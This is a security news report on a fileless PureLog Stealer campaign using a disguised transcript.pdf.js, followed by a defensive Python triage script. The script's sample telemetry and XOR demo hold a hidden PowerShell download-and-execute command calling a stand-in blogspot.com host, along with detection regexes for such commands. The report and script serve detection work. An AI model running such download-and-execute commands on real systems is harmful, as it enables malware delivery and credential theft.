Gbhackers
Fileless PureLog Stealer Campaign Exploits Compromised Websites
A campaign is using compromised websites to deliver a malicious JavaScript file named transcript.pdf.js that deploys PureLog Stealer, a .NET-based infostealer. The infection is fileless: the script launches PowerShell, which fetches the next stage from Google Blogspot pages and runs the payload in memory, leaving little on disk for a forensic examiner to find. The lure works because Windows Explorer hides known file extensions by default, so transcript.pdf.js is displayed as transcript.pdf; double-clicking it runs the script through the Windows Script Host rather than opening a document. Once running, PureLog Stealer harvests credentials, cookies and autofill data from major web browsers and from cryptocurrency wallets. To evade detection the campaign XOR-encodes its payloads and relies on legitimate Microsoft binaries, so the malicious activity blends into normal process activity and is harder to detect and respond to. Securonix tracks the framework as Veil#Drop.
Key Points:
• PureLog Stealer is delivered filelessly, with its payloads run in memory by PowerShell.
• The attack vector is a malicious JavaScript file disguised as a PDF (transcript.pdf.js).
• Stolen data includes browser credentials, cookies and autofill data, and cryptocurrency wallet information.
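As an added example (not code from the GBHackers article or from Securonix), the following Python sketches the checks a detection engineer would run over process-creation telemetry for the chain described above: a script host opening a double-extension file, PowerShell spawned by that script host with hidden or in-memory execution flags, and a stage fetched from blogspot.com. It also brute-forces a single-byte XOR key on a constructed blob, because the article says the payload is XOR-encoded but gives no key scheme. The event format, file paths, the blogspot subdomain, the command-line flags and the XOR key are all assumptions made for illustration, not indicators from the campaign.

```python
"""Triage heuristics for the transcript.pdf.js -> PowerShell -> Blogspot chain.

Added example, not code from the GBHackers article or from Securonix.
The events below are constructed to resemble Windows process-creation
telemetry; the field layout, file names, domains and command-line flags are
assumptions for illustration, not indicators taken from the campaign. The XOR
helper assumes a single-byte key, a generic responder technique; the article
does not describe the real key scheme.
"""
import re
from dataclasses import dataclass

# Script hosts that run a .js file when a user double-clicks it.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# A document extension immediately followed by a script extension
# (transcript.pdf.js). Explorer hides the trailing ".js" by default.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)\.(?:js|jse|vbs|vbe|wsf|hta)\b", re.I)

# Flags associated with hidden or encoded PowerShell (assumed, generic).
PS_EVASION = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile\b|"
    r"(?:ep|executionpolicy)\s+bypass|e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,})",
    re.I,
)
# Download-and-execute primitives that keep the payload in memory.
IN_MEMORY = re.compile(r"\b(?:IEX|Invoke-Expression|DownloadString|DownloadData)\b", re.I)
# Stage hosted on Google Blogspot (the subdomain in the sample is constructed).
BLOGSPOT = re.compile(r"https?://[a-z0-9.-]*\.blogspot\.com\b", re.I)

# Constructed record format: parent=<exe> image=<exe> cmdline=<rest of line>
EVENT_RE = re.compile(r"parent=(\S+)\s+image=(\S+)\s+cmdline=(.*)$")


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed process-creation record."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised event: {line!r}")
    return ProcEvent(*m.groups())


def score_event(ev: ProcEvent) -> list[str]:
    """Reasons an event looks like part of the chain; empty list if nothing fired."""
    image, parent = ev.image.lower(), ev.parent.lower()
    reasons: list[str] = []
    if image in SCRIPT_HOSTS and DOUBLE_EXT.search(ev.cmdline):
        reasons.append("script host opened a double-extension file")
    if image == "powershell.exe":
        if parent in SCRIPT_HOSTS:
            reasons.append("powershell spawned by a script host")
        if PS_EVASION.search(ev.cmdline):
            reasons.append("hidden or encoded powershell")
        if IN_MEMORY.search(ev.cmdline):
            reasons.append("in-memory download-and-execute")
    if BLOGSPOT.search(ev.cmdline):
        reasons.append("stage fetched from blogspot.com")
    return reasons


def triage(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that trips at least one heuristic."""
    hits = []
    for i, line in enumerate(lines):
        reasons = score_event(parse_event(line))
        if reasons:
            hits.append((i, reasons))
    return hits


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_single_byte_xor(blob: bytes) -> tuple[int, bytes]:
    """Brute-force a single-byte XOR key, preferring output that looks like script text."""
    def plausibility(candidate: bytes) -> int:
        good = sum(1 for c in candidate if c == 0x20 or (c < 128 and chr(c).isalnum()))
        bad = sum(1 for c in candidate if c >= 127 or (c < 32 and c not in (9, 10, 13)))
        return good - 10 * bad
    key = max(range(256), key=lambda k: plausibility(xor_bytes(blob, k)))
    return key, xor_bytes(blob, key)


# Constructed sample telemetry: two events from the chain, two benign ones.
SAMPLE_EVENTS = [
    r'parent=explorer.exe image=wscript.exe cmdline="C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\transcript.pdf.js"',
    "parent=wscript.exe image=powershell.exe cmdline=powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example-payload.blogspot.com/2024/01/stage.html')\"",
    r'parent=explorer.exe image=winword.exe cmdline="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Documents\notes.docx"',
    r"parent=cmd.exe image=powershell.exe cmdline=powershell.exe -File C:\scripts\nightly-backup.ps1",
]

# Constructed second stage, XOR-encoded with an assumed key for the demo.
STAGE2_PLAINTEXT = b"$w = New-Object Net.WebClient; IEX $w.DownloadString('https://example-payload.blogspot.com/2024/01/stage.html')"
STAGE2_XOR_KEY = 0x5A
STAGE2_BLOB = xor_bytes(STAGE2_PLAINTEXT, STAGE2_XOR_KEY)

if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(idx, "; ".join(why))
    key, text = recover_single_byte_xor(STAGE2_BLOB)
    print(f"recovered key 0x{key:02X}:", text.decode())
```

The heuristics are deliberately chained: a script host alone, or PowerShell with -w hidden alone, is noisy in many estates, but a script host opening a *.pdf.js and then spawning PowerShell that pulls from blogspot.com is specific enough to page on. The XOR brute force scores candidates by how much ASCII script text they produce, which is the same trick a responder uses on any small encoded blob before reaching for a disassembler.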